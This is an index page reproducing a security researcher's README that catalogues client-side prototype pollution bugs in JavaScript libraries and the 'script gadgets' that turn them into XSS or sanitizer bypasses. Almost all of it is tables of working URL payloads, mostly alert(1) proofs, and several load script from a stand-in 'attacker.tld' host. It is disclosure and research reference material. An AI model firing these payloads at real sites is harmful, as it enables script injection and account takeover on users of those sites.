Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/BlackFan/client-side-prototype-pollution
Prototype Pollution and useful Script Gadgets
https://github.com/BlackFan/client-side-prototype-pollution
Last synced: about 2 months ago
JSON representation
Prototype Pollution and useful Script Gadgets
- Host: GitHub
- URL: https://github.com/BlackFan/client-side-prototype-pollution
- Owner: BlackFan
- Created: 2020-09-29T12:52:28.000Z (almost 4 years ago)
- Default Branch: master
- Last Pushed: 2024-01-27T12:22:39.000Z (8 months ago)
- Last Synced: 2024-06-05T17:57:29.029Z (4 months ago)
- Homepage:
- Size: 81.1 KB
- Stars: 1,324
- Watchers: 41
- Forks: 190
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Client-Side Prototype Pollution
## Intro
If you are unfamiliar with Prototype Pollution Attack, you should read the following first:
[JavaScript prototype pollution attack in NodeJS](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf) by Olivier Arteau
[Prototype pollution – and bypassing client-side HTML sanitizers](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) by Michał Bentkowski
In this repository, I am trying to collect examples of libraries that are vulnerable to Prototype Pollution due to `document.location` parsing and useful script gadgets that can be used to demonstrate the impact.
## Prototype Pollution
| Name | Payload | Refs | Found by |
|----------------------------------------------------------------------------|--------------------------------------------------------------------------|---------------------------------------------|--------------------------------------------------|
| Wistia Embedded Video (**Fixed**) | `?__proto__[test]=test`
`?__proto__.test=test` | [[1]](https://hackerone.com/reports/986386) | [William Bowling](https://twitter.com/wcbowling) |
| [jQuery query-object plugin](/pp/jquery-query-object.md)
CVE-2021-20083 | `?__proto__[test]=test`
`#__proto__[test]=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [jQuery Sparkle](/pp/jquery-sparkle.md)
CVE-2021-20084 | `?__proto__.test=test`
`?constructor.prototype.test=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [V4Fire Core Library](/pp/v4fire-core.md) | `?__proto__.test=test`
`?__proto__[test]=test`
`?__proto__[test]={"json":"value"}`| | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [backbone-query-parameters](/pp/backbone-qp.md)
CVE-2021-20085 | `?__proto__.test=test`
`?constructor.prototype.test=test`
`?__proto__.array=1\|2\|3`| [[1]](https://bugcrowd.com/disclosures/57b28008-4653-4dec-88c3-4d38e40023ff/toolbox-teslamotors-com-html-injection-via-prototype-pollution-potential-xss) | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [jQuery BBQ](/pp/jquery-bbq.md)
CVE-2021-20086 | `?__proto__[test]=test`
`?constructor[prototype][test]=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [jquery-deparam](/pp/jquery-deparam.md)
CVE-2021-20087 | `?__proto__[test]=test`
`?constructor[prototype][test]=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [MooTools More](/pp/mootools-more.md)
CVE-2021-20088 | `?__proto__[test]=test`
`?constructor[prototype][test]=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Swiftype Site Search](/pp/swiftype-site-search.md) (**Fixed**) | `#__proto__[test]=test` | [[1]](https://hackerone.com/reports/998398) | [s1r1us](https://twitter.com/S1r1u5_) |
| [CanJS deparam](/pp/canjs-deparam.md) | `?__proto__[test]=test`
`?constructor[prototype][test]=test` | | [Rahul Maini](https://twitter.com/iamnoooob) |
| [Purl (jQuery-URL-Parser)](/pp/purl.md)
CVE-2021-20089 | `?__proto__[test]=test`
`?constructor[prototype][test]=test`
`#__proto__[test]=test`| | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [HubSpot Tracking Code](/pp/hubspot.md) (**Fixed**) | `?__proto__[test]=test`
`?constructor[prototype][test]=test`
`#__proto__[test]=test`| | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [YUI 3 querystring-parse](/pp/yui3.md) | `?constructor[prototype][test]=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Mutiny](/pp/mutiny.md) (**Fixed**) | `?__proto__.test=test` | | [SPQR](https://twitter.com/amlnspqr) |
| [jQuery parseParams](/pp/jquery-parseparam.md) | `?__proto__.test=test`
`?constructor.prototype.test=test` | | [POSIX](https://twitter.com/po6ix) |
| [php.js parse_str](/pp/parse_str.md) | `?__proto__[test]=test`
`?constructor[prototype][test]=test` | | [POSIX](https://twitter.com/po6ix) |
| [arg.js](/pp/arg-js.md) | `?__proto__[test]=test`
`?__proto__.test=test`
`?constructor[prototype][test]=test`
`#__proto__[test]=test`| | [POSIX](https://twitter.com/po6ix) |
| [davis.js](/pp/davis-js.md) | `?__proto__[test]=test` | | [POSIX](https://twitter.com/po6ix) |
| [Component querystring](/pp/component_querystring.md) | `?__proto__[NUMBER]=test`
`?__proto__[123]=test` | | [Masato Kinugawa](https://twitter.com/kinugawamasato)|
| [Aurelia path](/pp/aurelia.md) | `?__proto__[test]=test` | [[1]](https://github.com/aurelia/path/issues/44) | [s1r1us](https://twitter.com/S1r1u5_) |
| [analytics-utils < 1.0.3](/pp/analytics-utils.md) | `?__proto__[test]=test`
`?constructor[prototype][test]=test` | [[1]](https://github.com/DavidWells/analytics/issues/204) | [alexdaviestray](https://github.com/alexdaviestray) |
## Script Gadgets
| Name | Payload | Impact | Refs | Found by |
|---------------------------------------------------------|-------------------------------------------------------------------------------|-------------------|---------------------------------------------------|-----------------------------------------------------|
| [Wistia Embedded Video](/gadgets/wistia-video.md) | `?__proto__[innerHTML]=![]()
` | XSS | [[1]](https://hackerone.com/reports/986386) | [William Bowling](https://twitter.com/wcbowling) |
| [jQuery $.get](/gadgets/jquery.md#get-jquery-all-versions) | `?__proto__[context]=![]()
`
`&__proto__[jquery]=x`| XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [jQuery $.get >= 3.0.0](/gadgets/jquery.md#get-jquery--300)
Boolean.prototype | `?__proto__[url][]=data:,alert(1)//`
`&__proto__[dataType]=script` | XSS | | [Michał Bentkowski](https://twitter.com/SecurityMB) |
| [jQuery $.get >= 3.0.0](/gadgets/jquery.md#get-jquery--300-1)
Boolean.prototype | `?__proto__[url]=data:,alert(1)//`
`&__proto__[dataType]=script`
`&__proto__[crossDomain]=`| XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [jQuery $.getScript >= 3.4.0](/gadgets/jquery.md#getscript-jquery--340) | `?__proto__[src][]=data:,alert(1)//` | XSS | | [s1r1us](https://twitter.com/S1r1u5_) |
| [jQuery $.getScript 3.0.0 - 3.3.1](/gadgets/jquery.md#getscript-jquery-300---331)
Boolean.prototype | `?__proto__[url]=data:,alert(1)//` | XSS | | [s1r1us](https://twitter.com/S1r1u5_) |
| [jQuery $(html)](/gadgets/jquery.md#html-jquery-all-versions) | `?__proto__[div][0]=1`
`&__proto__[div][1]=![]()
`| XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [jQuery $(x).off](/gadgets/jquery.md#xoff-jquery-all-versions)
String.prototype | `?__proto__[preventDefault]=x`
`&__proto__[handleObj]=x`
`&__proto__[delegateTarget]=![]()
`| XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [jQuery $(x).attr](/gadgets/jquery.md#xattr-jquery--180) | `?__proto__[OnError]=alert(1)`
`&__proto__[SRC]=fakeimagewontload.jpg` | XSS | [[1]](https://joaxcar.com/blog/2024/01/26/hunting-for-prototype-pollution-gadgets-in-jquery-intigriti-0124-challenge/) [[2]](https://mizu.re/post/intigriti-january-2024-xss-challenge) | [Johan Carlsson](https://twitter.com/joaxcar) |
| [jQuery $(x).on, $(x).submit](/gadgets/jquery.md#xon-xsubmit-jquery--190) | `?__proto__[handler][]=x`
`&__proto__[selector][]=![]()
`
`&__proto__[focus]=x`
`&__proto__[needsContext]=x` | XSS | [[1]](https://joaxcar.com/blog/2024/01/26/hunting-for-prototype-pollution-gadgets-in-jquery-intigriti-0124-challenge/) | [Johan Carlsson](https://twitter.com/joaxcar) |
| [Google reCAPTCHA](/gadgets/recaptcha.md) | `?__proto__[srcdoc][]=alert(1)` | XSS | | [s1r1us](https://twitter.com/S1r1u5_) |
| [Twitter Universal Website Tag](/gadgets/twitter-uwt.md) (**Fixed**)| `?__proto__[hif][]=javascript:alert(1)` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Tealium Universal Tag](/gadgets/tealium-utag.md) | `?__proto__[attrs][src]=1`
`&__proto__[src]=data:,alert(1)//` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Akamai Boomerang](/gadgets/akamai-boomerang.md) | `?__proto__[BOOMR]=1`
`&__proto__[url]=//attacker.tld/js.js` | XSS | | [s1r1us](https://twitter.com/S1r1u5_) |
| [Lodash <= 4.17.15](/gadgets/lodash.md) | `?__proto__[sourceURL]=%E2%80%A8%E2%80%A9alert(1)` | XSS | [[1]](https://github.com/lodash/lodash/pull/4518) | [Alex Brasetvik](https://twitter.com/alexbrasetvik) |
| [sanitize-html](/gadgets/sanitize-html.md) | `?__proto__[*][]=onload` | Bypass | [[1]](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) | [Michał Bentkowski](https://twitter.com/SecurityMB) |
| [sanitize-html](/gadgets/sanitize-html.md) | `?__proto__[innerText]=alert(1)` | Bypass | [[1]](https://github.com/apostrophecms/sanitize-html/commit/0fe551c2c6fac1277c0b9688263bd61acc52baf8)| [Hpdoger](https://twitter.com/hpdoger) |
| [js-xss](/gadgets/js-xss.md) | `?__proto__[whiteList][img][0]=onerror`
`&__proto__[whiteList][img][1]=src`| Bypass | [[1]](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) | [Michał Bentkowski](https://twitter.com/SecurityMB) |
| [DOMPurify <= 2.0.12](/gadgets/dompurify.md) | `?__proto__[ALLOWED_ATTR][0]=onerror`
`&__proto__[ALLOWED_ATTR][1]=src` | Bypass | [[1]](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) | [Michał Bentkowski](https://twitter.com/SecurityMB) |
| [DOMPurify <= 2.0.12](/gadgets/dompurify.md) | `?__proto__[documentMode]=9` | Bypass | [[1]](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) | [Michał Bentkowski](https://twitter.com/SecurityMB) |
| [Google Closure](/gadgets/closure.md) | `?__proto__[*%20ONERROR]=1`
`&__proto__[*%20SRC]=1` | Bypass | [[1]](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) | [Michał Bentkowski](https://twitter.com/SecurityMB) |
| [Google Closure](/gadgets/closure.md) | `?__proto__[CLOSURE_BASE_PATH]=data:,alert(1)//` | XSS | [[1]](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) | [Michał Bentkowski](https://twitter.com/SecurityMB) |
| [Marionette.js / Backbone.js](/gadgets/marionette.md) | `?__proto__[tagName]=img`
`&__proto__[src][]=x:`
`&__proto__[onerror][]=alert(1)` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Adobe Dynamic Tag Management](/gadgets/adobe-dtm.md) | `?__proto__[src]=data:,alert(1)//` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Adobe Dynamic Tag Management](/gadgets/adobe-dtm.md) | `?__proto__[SRC]=![]()
` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Swiftype Site Search](/gadgets/swiftype-site-search.md)| `?__proto__[xxx]=alert(1)` | XSS | | [s1r1us](https://twitter.com/S1r1u5_) |
| [Embedly Cards](/gadgets/embedly.md) | `?__proto__[onload]=alert(1)` | XSS | | [Guilherme Keerok](https://twitter.com/k33r0k) |
| [Segment Analytics.js](/gadgets/segment-analytics.md) | `?__proto__[script][0]=1`
`&__proto__[script][1]=![]()
`| XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Knockout.js](/gadgets/knockout.md)
Array.prototype | `?__proto__[4]=a':1,[alert(1)]:1,'b`
`&__proto__[5]=,` | XSS | | [Michał Bentkowski](https://twitter.com/SecurityMB) |
| [Zepto.js](/gadgets/zepto.md) | `?__proto__[onerror]=alert(1)` | XSS | [[1]](https://xz.aliyun.com/t/8552) | [lih3iu](https://twitter.com/lih3iu) |
| [Zepto.js](/gadgets/zepto.md) | `?__proto__[html]=![]()
` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Sprint.js](/gadgets/sprint.md) | `?__proto__[div][intro]=![]()
` | XSS | [[1]](https://xz.aliyun.com/t/8552) | [lih3iu](https://twitter.com/lih3iu) |
| [Vue.js](/gadgets/vuejs.md) | `?__proto__[v-if]=_c.constructor('alert(1)')()` | XSS | | [POSIX](https://twitter.com/po6ix) |
| [Vue.js](/gadgets/vuejs.md) | `?__proto__[attrs][0][name]=src`
`&__proto__[attrs][0][value]=xxx`
`&__proto__[xxx]=data:,alert(1)//`
`&__proto__[is]=script` | XSS | [[1]](https://blog.s1r1us.ninja/CTF/zer0ptsctf2021-challenges) | [s1r1us](https://twitter.com/S1r1u5_) |
| [Vue.js](/gadgets/vuejs.md) | `?__proto__[v-bind:class]=''.constructor.constructor('alert(1)')()` | XSS | [[1]](https://blog.s1r1us.ninja/CTF/zer0ptsctf2021-challenges) | [r00timentary](https://ctftime.org/team/32783) |
| [Vue.js](/gadgets/vuejs.md) | `?__proto__[data]=a`
`&__proto__[template][nodeType]=a`
`&__proto__[template][innerHTML]=alert(1)` | XSS | [[1]](https://blog.s1r1us.ninja/CTF/zer0ptsctf2021-challenges) | [SuperGuesser](https://twitter.com/SuperGuesser) |
| [Vue.js](/gadgets/vuejs.md) | `?__proto__[props][][value]=a`
`&__proto__[name]=":''.constructor.constructor('alert(1)')(),"` | XSS | [[1]](https://blog.s1r1us.ninja/CTF/zer0ptsctf2021-challenges) | [st98_](https://twitter.com/st98_) |
| [Vue.js](/gadgets/vuejs.md) | `?__proto__[template]=alert(1)` | XSS | [[1]](https://github.com/aszx87410/ctf-writeups/issues/24) | [huli](https://github.com/aszx87410/) |
| [Demandbase Tag](/gadgets/demandbase-tag.md) | `?__proto__[Config][SiteOptimization][enabled]=1`
`&__proto__[Config][SiteOptimization][recommendationApiURL]=//attacker.tld/json_cors.php?` | XSS | | [SPQR](https://twitter.com/amlnspqr) |
| [@analytics/google-tag-manager](/gadgets/analytics-google-tag-manager.md) | `?__proto__[customScriptSrc]=//attacker.tld/xss.js` | XSS | | [SPQR](https://twitter.com/amlnspqr) |
| [i18next](/gadgets/i18next.md) | `?__proto__[lng]=cimode`
`&__proto__[appendNamespaceToCIMode]=x`
`&__proto__[nsSeparator]=![]()
` | Potential XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [i18next < 19.8.5](/gadgets/i18next.md) | `?__proto__[lng]=a`
`&__proto__[a]=b`
`&__proto__[obj]=c`
`&__proto__[k]=d`
`&__proto__[d]=![]()
` | Potential XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [i18next >= 19.8.5](/gadgets/i18next.md) | `?__proto__[lng]=a`
`&__proto__[key]=![]()
` | Potential XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Google Analytics](/gadgets/google-analytics.md) | `?__proto__[cookieName]=COOKIE%3DInjection%3B` | Cookie Injection | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [Popper.js](/gadgets/popper.md) | `?__proto__[arrow][style]=color:red;transition:all%201s`
`&__proto__[arrow][ontransitionend]=alert(1)`
`?__proto__[reference][style]=color:red;transition:all%201s`
`&__proto__[reference][ontransitionend]=alert(2)`
`?__proto__[popper][style]=color:red;transition:all%201s`
`&__proto__[popper][ontransitionend]=alert(3)` | XSS | [[1]](https://github.com/aszx87410/ctf-writeups/issues/36) [[2]](https://lemonslab.me/posts/small-talk-writeup/) | [Matheus Vrech](https://twitter.com/vrechson) |
| [Pendo Agent](/gadgets/pendo-agent.md) | `?__proto__[dataHost]=attacker.tld/js.js%23` | XSS | | [Renwa](https://twitter.com/RenwaX23) |
| [script.aculo.us](/gadgets/scriptaculous.md)
String.constructor | `?x=x`
`&x[constructor][__parseStyleElement][innerHTML]=![]()
` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |
| [hCaptcha](/gadgets/hcaptcha.md) (**Fixed**) | `?__proto__[assethost]=javascript:alert(1)//` | XSS | | [Masato Kinugawa](https://twitter.com/kinugawamasato) |
| [Google Closure](/gadgets/closure.md) | `?__proto__[trustedTypes]=x`
`&__proto__[emptyHTML]=![]()
`| XSS | | [Mathias Karlsson](https://twitter.com/avlidienbrunn) |
| [Google Tag Manager](/gadgets/google-tag-manager.md) | `?__proto__[vtp_enableRecaptcha]=1`
`&__proto__[srcdoc]=alert(1)`| XSS | | [terjanq](https://twitter.com/terjanq) |
| [Google Tag Manager](/gadgets/google-tag-manager.md) | `?__proto__[q][0][0]=require`
`&__proto__[q][0][1]=x`
`&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7`| XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) /
[Masato Kinugawa](https://twitter.com/kinugawamasato) |
| [Google Analytics](/gadgets/google-analytics.md) | `?__proto__[q][0][0]=require`
`&__proto__[q][0][1]=x`
`&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7`| XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) /
[Masato Kinugawa](https://twitter.com/kinugawamasato) |